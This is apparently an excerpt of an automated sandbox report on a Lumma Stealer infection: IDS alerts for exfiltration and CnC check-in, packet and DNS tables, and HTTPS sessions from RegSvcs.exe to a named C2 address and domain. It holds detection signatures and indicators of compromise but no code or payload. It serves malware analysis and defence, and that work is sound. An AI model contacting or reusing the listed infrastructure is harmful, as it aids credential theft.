2025-01-27T15:58:24.082393+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.600432+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.600432+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:26.035507+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:26.035507+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:27.552936+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:27.552936+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:29.081608+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:29.081608+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.152602+0100 | 2059424 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) | 1 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.152602+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.908893+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
- Total Packets: 94
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 27, 2025 15:58:20.539253950 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:20.539282084 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:20.539356947 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:20.543554068 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:20.543572903 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:21.067914009 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:21.067992926 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.071176052 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.071191072 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:21.071506023 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:21.114439011 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.149066925 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.149100065 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.149195910 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:21.593539953 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:21.593928099 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:21.594022036 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.620739937 CET | 49743 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.620769024 CET | 443 | 49743 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:21.720988989 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.721041918 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:21.721170902 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.722193003 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:21.722214937 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.192080021 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.192147970 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.193454981 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.193464041 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.193810940 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.195167065 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.195183039 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.195255041 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.688731909 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.688798904 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.688849926 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.688864946 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.688879967 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.688918114 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.688930035 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.689243078 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.689281940 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.689292908 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.689306021 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.689359903 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.689368963 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.693701029 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.693736076 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.693777084 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.693793058 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.693835974 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.777348995 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.777446032 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.777488947 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.777506113 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.777528048 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.777578115 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.777585983 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.777601004 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.777653933 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.777806997 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.777818918 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.777844906 CET | 49751 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.777851105 CET | 443 | 49751 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.867619991 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.867643118 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:22.867719889 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.868463039 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:22.868478060 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:23.347016096 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:23.347094059 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:23.348372936 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:23.348377943 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:23.348751068 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:23.358284950 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:23.358376026 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:23.358422041 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.082366943 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.082676888 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.082767010 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.082889080 CET | 49759 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.082906008 CET | 443 | 49759 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.097948074 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.097982883 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.098092079 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.098620892 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.098630905 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.600297928 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.600431919 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.602161884 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.602170944 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.602508068 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.604451895 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.604603052 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.604634047 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:24.604743004 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:24.647334099 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:25.478101015 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:25.478213072 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:25.478387117 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:25.478387117 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:25.549873114 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:25.549911022 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:25.549999952 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:25.550508976 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:25.550529957 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:25.786463022 CET | 49771 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:25.786480904 CET | 443 | 49771 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:26.035379887 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:26.035506964 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:26.036654949 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:26.036662102 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:26.036911964 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:26.038115978 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:26.038223982 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:26.038259029 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:26.038321018 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:26.038332939 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:26.989608049 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:26.989686966 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:26.989751101 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:26.989871025 CET | 49782 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:26.989887953 CET | 443 | 49782 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:27.072506905 CET | 49791 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:27.072526932 CET | 443 | 49791 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:27.072609901 CET | 49791 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:27.072885036 CET | 49791 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:27.072895050 CET | 443 | 49791 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:27.552804947 CET | 443 | 49791 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:27.552936077 CET | 49791 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:27.554615021 CET | 49791 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:27.554621935 CET | 443 | 49791 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:27.554853916 CET | 443 | 49791 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:27.556210041 CET | 49791 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:27.556353092 CET | 49791 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:27.556379080 CET | 443 | 49791 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:28.421416998 CET | 443 | 49791 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:28.421781063 CET | 443 | 49791 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:28.421932936 CET | 49791 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:28.421999931 CET | 49791 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:28.422017097 CET | 443 | 49791 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:28.604146004 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:28.604182959 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:28.604283094 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:28.604566097 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:28.604576111 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:29.081451893 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:29.081608057 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:29.083261967 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:29.083273888 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:29.083524942 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:29.085067987 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:29.085381031 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:29.085416079 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:29.085503101 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:29.085527897 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:29.085608959 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:29.085665941 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:29.085766077 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:29.085789919 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:29.085866928 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:29.085877895 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:32.626049042 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:32.626149893 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:32.626220942 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:32.626332998 CET | 49802 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:32.626348972 CET | 443 | 49802 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:32.630964041 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:32.631006002 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:32.631088972 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:32.631388903 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:32.631403923 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:33.152525902 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:33.152601957 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:33.153860092 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:33.153868914 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:33.154122114 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:33.155380964 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:33.155422926 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:33.155455112 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:33.908894062 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:33.908971071 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:33.909013033 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:33.909209013 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:33.909221888 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Jan 27, 2025 15:58:33.909235954 CET | 49826 | 443 | 192.168.2.7 | 104.21.29.142 |
Jan 27, 2025 15:58:33.909240007 CET | 443 | 49826 | 104.21.29.142 | 192.168.2.7 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 27, 2025 15:58:13.293934107 CET | 55563 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 27, 2025 15:58:13.300852060 CET | 53 | 55563 | 1.1.1.1 | 192.168.2.7 |
Jan 27, 2025 15:58:20.435970068 CET | 53738 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 27, 2025 15:58:20.449383974 CET | 53 | 53738 | 1.1.1.1 | 192.168.2.7 |
Jan 27, 2025 15:58:20.506711006 CET | 61999 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 27, 2025 15:58:20.515985966 CET | 53 | 61999 | 1.1.1.1 | 192.168.2.7 |
Jan 27, 2025 15:58:20.519335032 CET | 61168 | 53 | 192.168.2.7 | 1.1.1.1 |
Jan 27, 2025 15:58:20.530950069 CET | 53 | 61168 | 1.1.1.1 | 192.168.2.7 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 27, 2025 15:58:13.293934107 CET | 192.168.2.7 | 1.1.1.1 | 0x3cef | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 27, 2025 15:58:20.435970068 CET | 192.168.2.7 | 1.1.1.1 | 0x53da | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 27, 2025 15:58:20.506711006 CET | 192.168.2.7 | 1.1.1.1 | 0x7ea | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 27, 2025 15:58:20.519335032 CET | 192.168.2.7 | 1.1.1.1 | 0xccb6 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 27, 2025 15:58:13.300852060 CET | 1.1.1.1 | 192.168.2.7 | 0x3cef | No error (0) | twc.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Jan 27, 2025 15:58:13.300852060 CET | 1.1.1.1 | 192.168.2.7 | 0x3cef | No error (0) | 104.40.149.189 | A (IP address) | IN (0x0001) | false | ||
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | azurefd-t-fb-prod.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | dual.s-part-0017.t-0009.fb-t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | s-part-0017.t-0009.fb-t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Jan 27, 2025 15:58:13.357811928 CET | 1.1.1.1 | 192.168.2.7 | 0x323d | No error (0) | 13.107.253.45 | A (IP address) | IN (0x0001) | false | ||
Jan 27, 2025 15:58:20.449383974 CET | 1.1.1.1 | 192.168.2.7 | 0x53da | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 27, 2025 15:58:20.515985966 CET | 1.1.1.1 | 192.168.2.7 | 0x7ea | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Jan 27, 2025 15:58:20.530950069 CET | 1.1.1.1 | 192.168.2.7 | 0xccb6 | No error (0) | 104.21.29.142 | A (IP address) | IN (0x0001) | false | ||
Jan 27, 2025 15:58:20.530950069 CET | 1.1.1.1 | 192.168.2.7 | 0xccb6 | No error (0) | 172.67.149.66 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:21 UTC | 262 | OUT | |
2025-01-27 14:58:21 UTC | 8 | OUT | |
2025-01-27 14:58:21 UTC | 1125 | IN | |
2025-01-27 14:58:21 UTC | 7 | IN | |
2025-01-27 14:58:21 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:22 UTC | 263 | OUT | |
2025-01-27 14:58:22 UTC | 46 | OUT | |
2025-01-27 14:58:22 UTC | 1123 | IN | |
2025-01-27 14:58:22 UTC | 246 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN | |
2025-01-27 14:58:22 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:23 UTC | 279 | OUT | |
2025-01-27 14:58:23 UTC | 12831 | OUT | |
2025-01-27 14:58:24 UTC | 1122 | IN | |
2025-01-27 14:58:24 UTC | 20 | IN | |
2025-01-27 14:58:24 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:24 UTC | 273 | OUT | |
2025-01-27 14:58:24 UTC | 15027 | OUT | |
2025-01-27 14:58:25 UTC | 1126 | IN | |
2025-01-27 14:58:25 UTC | 20 | IN | |
2025-01-27 14:58:25 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:26 UTC | 277 | OUT | |
2025-01-27 14:58:26 UTC | 15331 | OUT | |
2025-01-27 14:58:26 UTC | 5045 | OUT | |
2025-01-27 14:58:26 UTC | 1127 | IN | |
2025-01-27 14:58:26 UTC | 20 | IN | |
2025-01-27 14:58:26 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | 8024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-27 14:58:27 UTC | 277 | OUT | |
2025-01-27 14:58:27 UTC | 2610 | OUT | |
2025-01-27 14:58:28 UTC | 1124 | IN | |
2025-01-27 14:58:28 UTC | 20 | IN | |
2025-01-27 14:58:28 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
